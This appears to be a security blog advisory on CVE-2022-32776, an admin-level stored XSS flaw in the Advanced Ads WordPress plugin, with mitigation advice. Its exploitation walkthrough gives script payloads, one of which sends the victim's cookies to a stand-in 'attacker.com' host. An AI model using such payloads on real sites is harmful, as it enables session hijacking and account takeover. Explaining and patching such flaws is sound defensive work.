CVE-2022-32776 - Admin+ Stored XSS Vulnerability in Advanced Ads – Ad Manager & AdSense WordPress Plugin (<= 1.31.1)
WordPress powers millions of websites, making plugin security a top concern for website owners, admins, and developers. In June 2022, a serious vulnerability was found in the popular "Advanced Ads – Ad Manager & AdSense" plugin by Advanced Ads GmbH. Registered as CVE-2022-32776, this flaw allows an authenticated user (admin or higher) to inject malicious JavaScript—opening the door to stored Cross-Site Scripting (XSS) attacks.
This post will break down what happened, how the vulnerability works, how an attacker could exploit it, and what you can do to stay safe.
What is CVE-2022-32776?
CVE-2022-32776 is a stored (persistent) XSS vulnerability found in "Advanced Ads – Ad Manager & AdSense" WordPress plugin version 1.31.1 and below.
Type: Stored Cross-Site Scripting (XSS)
- Affected Plugin: Advanced Ads – Ad Manager & AdSense
Impacted Versions: All versions up to and including 1.31.1
- Respecting Roles: Only authenticated users with admin or higher privileges could perform the attack.
What is Stored XSS?
Stored XSS happens when user-supplied data is saved on the server (e.g., in the database) and later rendered within web pages without proper sanitization. When other users visit the affected page, the malicious JavaScript runs in their browsers, potentially stealing cookies, session tokens, or performing unwanted actions.
The vulnerability lives in the plugin’s ad management pages. Specifically
- Certain fields in the ad configuration forms do not properly escape or sanitize HTML/JavaScript code.
- An attacker with admin+, by entering JavaScript payloads into these fields, stores malicious code in the database.
- When another admin visits the plugin’s ad management or details page, their browser executes the malicious script as part of the page.
Example Vulnerable Field
The issue was confirmed in at least the “Title” and possibly other ad metadata fields.
Step 1: Login
The attacker logs in to the vulnerable WordPress site as an administrator or higher.
### Step 2: Create/Edit an Ad
They navigate to Advanced Ads › Ads in the WordPress dashboard, select an ad to edit or create a new one.
In the "Title" field (or other unprotected input), they enter a malicious payload such as
<script>alert('XSS Exploited!');</script>
Or a more stealthy, malicious one, like
<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>
Step 4: Save Changes
The attacker clicks "Save" or "Publish" for the ad. Advanced Ads stores the input without properly filtering out JavaScript.
Step 5: Trigger
Any admin (including the same attacker) who views the list of ads or the affected ad’s edit page will load and execute the JavaScript in their browser.
Below is a very simple example payload for PoC
<script>alert(document.domain);</script>
Paste the above code into the ad’s “Title” field.
2. Save/publish the ad.
3. When you (or any admin) visit the ads overview, you’ll see a pop-up alert showing "yourdomain.com".
How Dangerous is This?
While this vulnerability requires admin access (and is not “guest” or “subscriber” level), it’s still a significant risk:
- Privilege Escalation: On shared or multisite installs, some plugins grant extra admins for specific purposes. A malicious admin could use XSS to steal super admin cookies or perform CSRF attacks.
- Supply Chain: If an attacker compromises an admin account via phishing, keylogging, or other means, persistent XSS allows further, stealthy exploitation.
- SaaS Environment: Larger teams and agencies using this plugin across multiple clients face a higher exposure.
Discovery & Disclosure
- The vulnerability was reported to the plugin authors by Wordfence.
The patch included stronger output escaping and input sanitization protections for all form fields.
Changelog Reference:
Advanced Ads Changelog
How to Protect Your Site
1. Update the Plugin:
Immediately update to Advanced Ads version 1.32. or later.
2. Audit Admin Accounts:
Regularly review the list of users with admin or above privileges. Remove accounts that are no longer needed.
3. Use a Web Application Firewall (WAF):
A good WAF, like Wordfence or Sucuri, adds an extra layer of detection for XSS attacks—even post-authentication.
4. Least-Privilege Principle:
Grant admin-level access to as few users as possible.
5. Monitor for Unusual Activity:
Set up alerts for unusual behaviors—such as new plugin installations, new admin user additions, or unexpected ad modifications.
References & Further Reading
- Wordfence Security Blog: XSS in Advanced Ads
- Advanced Ads – Ad Manager & AdSense — WordPress.org
- CVE Details for CVE-2022-32776
- Patch Notes / Changelog
Summary Table
| Item | Details |
|---------------------|-----------------------------------------------|
| Vulnerability | Stored Cross-Site Scripting (XSS) |
| CVE | CVE-2022-32776 |
| Affected Plugin | Advanced Ads – Ad Manager & AdSense ≤ 1.31.1 |
| Patched Version | 1.32. |
| Privileges | Authenticated (Admin+) |
| Type | Stored XSS via Ad metadata fields |
Final Thoughts
While CVE-2022-32776 isn’t a “mass exploit” type bug, it highlights a frequently overlooked attack vector—malicious insiders or compromised admin accounts. Every plugin, no matter how reputable, can have flaws; that’s why regular updates and strong security hygiene are vital.
If you use Advanced Ads, check your version and update now. If your site was left unpatched, audit recent admin actions for anything suspicious.
Timeline
Published on: 11/08/2022 19:15:00 UTC
Last modified on: 11/09/2022 14:27:00 UTC